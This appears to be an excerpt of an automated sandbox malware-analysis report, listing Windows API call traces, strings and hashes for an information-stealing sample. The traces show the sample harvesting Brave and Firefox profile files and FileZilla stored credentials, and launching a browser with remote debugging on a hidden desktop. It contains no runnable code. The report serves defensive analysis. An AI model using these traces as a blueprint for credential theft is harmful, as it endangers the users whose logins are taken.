                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: cdddc54160345b06139f00274dfdbe978e3464277b9e4ec8f18a6db6eb174d5d
                                • Instruction ID: fd190c4aba28ea354d8fe38ed5885d635fe7c597200d0f66034cb7b5d4d945ae
                                • Opcode Fuzzy Hash: cdddc54160345b06139f00274dfdbe978e3464277b9e4ec8f18a6db6eb174d5d
                                • Instruction Fuzzy Hash: 4A521571A1160A9BCB61AFB6D899FBE77BAFF44300F04452CE84A97251DF34E941CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C60FF
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6152
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6185
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C61B5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C61F0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006C6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 082e3f902a7650f12c77f27113814976a89a5f0571479c3cc56ae4ab317c5cc2
                                • Instruction ID: 39fde775b20f7454f6b33093a97c52d0147716b879202baaea45288d522e3810
                                • Opcode Fuzzy Hash: 082e3f902a7650f12c77f27113814976a89a5f0571479c3cc56ae4ab317c5cc2
                                • Instruction Fuzzy Hash: 765216719116169BDB61ABB5DC49FBE77BAEF44300F14802CF909AB251DB34ED02CB98
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6B9D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6BCD
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6BFD
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 006D6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006D6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 006D6C5A
                                • lstrlen.KERNEL32(00000000), ref: 006D6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 006D6CE2
                                • lstrlen.KERNEL32(00000000), ref: 006D6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 006D6D6A
                                • lstrlen.KERNEL32(00000000), ref: 006D6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006D6DF2
                                • lstrlen.KERNEL32(00000000), ref: 006D6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006D6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 006D6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 006D6EC9
                                • LocalFree.KERNEL32(00000000), ref: 006D6ED4
                                • lstrlen.KERNEL32(?), ref: 006D6F6E
                                • lstrlen.KERNEL32(?), ref: 006D6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: 7eb83a423dbeb9ad5dd43264a20676b32ca97de069fbba9cdd3bc28d79b461cf
                                • Instruction ID: ef407afa0b58ad00a951ebc9680b4dc8a0e8f82b8d8a76c9dc78f24c920b5d0b
                                • Opcode Fuzzy Hash: 7eb83a423dbeb9ad5dd43264a20676b32ca97de069fbba9cdd3bc28d79b461cf
                                • Instruction Fuzzy Hash: D3024570A11616ABCB21ABB5DC59FBEBABAEF44710F044419F84AE7351DF34D901CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D4B7F
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BA7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: d8d78aa6d83db9f860dc0cb071cedfad55568c080946dda2bbbd9394ad3db5c3
                                • Instruction ID: 5e80500c16f78e406732d700018e605a32b8229992d7b314d84dac3b171fed27
                                • Opcode Fuzzy Hash: d8d78aa6d83db9f860dc0cb071cedfad55568c080946dda2bbbd9394ad3db5c3
                                • Instruction Fuzzy Hash: A9923170E016028FDB24DF29D948BA9B7E6BF44314F19806EE84ADB761DB35DC42CB54
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D12BF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12E7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D133A
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D135C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D1376
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D13E2
                                • lstrlen.KERNEL32(006F1794), ref: 006D13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D140A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1416
                                • lstrlen.KERNEL32(?), ref: 006D1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006D1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D147A
                                • StrCmpCA.SHLWAPI(?,00F1F008), ref: 006D14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1535
                                • StrCmpCA.SHLWAPI(?,00F1F3A0), ref: 006D1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D15E4
                                • StrCmpCA.SHLWAPI(?,00F1EFC0), ref: 006D1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1685
                                • StrCmpCA.SHLWAPI(?,00F1F080), ref: 006D16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006D181C
                                • FindClose.KERNEL32(00000000), ref: 006D182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 24ac5f69c58a640aa782b8d8abd57172439952a5e4e1facb16e79aa59367c452
                                • Instruction ID: 39dc79513f0dda1833b270b3594ee781180a9d4ea87e58b9e332170cb1029634
                                • Opcode Fuzzy Hash: 24ac5f69c58a640aa782b8d8abd57172439952a5e4e1facb16e79aa59367c452
                                • Instruction Fuzzy Hash: 91124771A10606ABDB20AF79D899EBE77BAAF45300F04452DE88ADB350DF74DC45CB90
                                APIs
                                • wsprintfA.USER32 ref: 006DCBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 006DCC13
                                • lstrcat.KERNEL32(?,?), ref: 006DCC5F
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006DCC71
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006DCC8B
                                • wsprintfA.USER32 ref: 006DCCB0
                                • PathMatchSpecA.SHLWAPI(?,00F18A50), ref: 006DCCE2
                                • CoInitialize.OLE32(00000000), ref: 006DCCEE
                                  • Part of subcall function 006DCAE0: CoCreateInstance.COMBASE(006EB110,00000000,00000001,006EB100,?), ref: 006DCB06
                                  • Part of subcall function 006DCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006DCB46
                                  • Part of subcall function 006DCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 006DCBC9
                                • CoUninitialize.COMBASE ref: 006DCD09
                                • lstrcat.KERNEL32(?,?), ref: 006DCD2E
                                • lstrlen.KERNEL32(?), ref: 006DCD3B
                                • StrCmpCA.SHLWAPI(?,006ECFEC), ref: 006DCD55
                                • wsprintfA.USER32 ref: 006DCD7D
                                • wsprintfA.USER32 ref: 006DCD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006DCDB0
                                • wsprintfA.USER32 ref: 006DCDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006DCDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 006DCE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 006DCE28
                                • CloseHandle.KERNEL32(00000000), ref: 006DCE33
                                • CloseHandle.KERNEL32(00000000), ref: 006DCE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006DCE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DCE94
                                • FindNextFileA.KERNEL32(?,?), ref: 006DCF8D
                                • FindClose.KERNEL32(?), ref: 006DCF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: f096472c2d1ddd1ede2a0fd65db8cbdeab7cc4ff075bb91b9eeb8b2dccc16c74
                                • Instruction ID: 6efedbaa97f4f606c4289650b765a94453cb35814b9d800440eeddff1452fd23
                                • Opcode Fuzzy Hash: f096472c2d1ddd1ede2a0fd65db8cbdeab7cc4ff075bb91b9eeb8b2dccc16c74
                                • Instruction Fuzzy Hash: F8C13FB1910219AFDB60DF64DC49FEE777AFF88310F144599F909A7290EE30AA85CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D12BF
                                • lstrlen.KERNEL32(006F4CA8), ref: 006D12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D12E7
                                • lstrcat.KERNEL32(00000000,006F4CA8), ref: 006D12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006D133A
                                • StrCmpCA.SHLWAPI(?,006F17A0), ref: 006D135C
                                • StrCmpCA.SHLWAPI(?,006F17A4), ref: 006D1376
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006D13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006D13E2
                                • lstrlen.KERNEL32(006F1794), ref: 006D13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D140A
                                • lstrcat.KERNEL32(00000000,006F1794), ref: 006D1416
                                • lstrlen.KERNEL32(?), ref: 006D1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006D1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D147A
                                • StrCmpCA.SHLWAPI(?,00F1F008), ref: 006D14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D1535
                                • StrCmpCA.SHLWAPI(?,00F1F3A0), ref: 006D1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006D181C
                                • FindClose.KERNEL32(00000000), ref: 006D182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 0196d33f65701f0c94f3d61bd8f3971df76662dfb0b012d1dc845e8450cc5e4e
                                • Instruction ID: 88950e59d1391806d5f5413648b7a5efb905ae857af3d866ccc562b66729600b
                                • Opcode Fuzzy Hash: 0196d33f65701f0c94f3d61bd8f3971df76662dfb0b012d1dc845e8450cc5e4e
                                • Instruction Fuzzy Hash: 9BC14571A10606ABCB21AFB6D899FBE77AAAF41300F04012DE84ADB351DF74D945CB90
                                APIs
                                • memset.MSVCRT ref: 006C9790
                                • lstrcat.KERNEL32(?,?), ref: 006C97A0
                                • lstrcat.KERNEL32(?,?), ref: 006C97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006C97C3
                                • memset.MSVCRT ref: 006C97D7
                                  • Part of subcall function 006E3E70: lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E3EA5
                                  • Part of subcall function 006E3E70: lstrcpy.KERNEL32(00000000,00F1FF58), ref: 006E3ECF
                                  • Part of subcall function 006E3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,006C134E,?,0000001A), ref: 006E3ED9
                                • wsprintfA.USER32 ref: 006C9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 006C9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 006C9844
                                  • Part of subcall function 006E46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006E46B9
                                  • Part of subcall function 006E46A0: Process32First.KERNEL32(00000000,00000128), ref: 006E46C9
                                  • Part of subcall function 006E46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006E46DB
                                  • Part of subcall function 006E46A0: StrCmpCA.SHLWAPI(?,?), ref: 006E46ED
                                  • Part of subcall function 006E46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E4702
                                  • Part of subcall function 006E46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006E4711
                                  • Part of subcall function 006E46A0: CloseHandle.KERNEL32(00000000), ref: 006E4718
                                  • Part of subcall function 006E46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006E4726
                                  • Part of subcall function 006E46A0: CloseHandle.KERNEL32(00000000), ref: 006E4731
                                • lstrcat.KERNEL32(00000000,?), ref: 006C9878
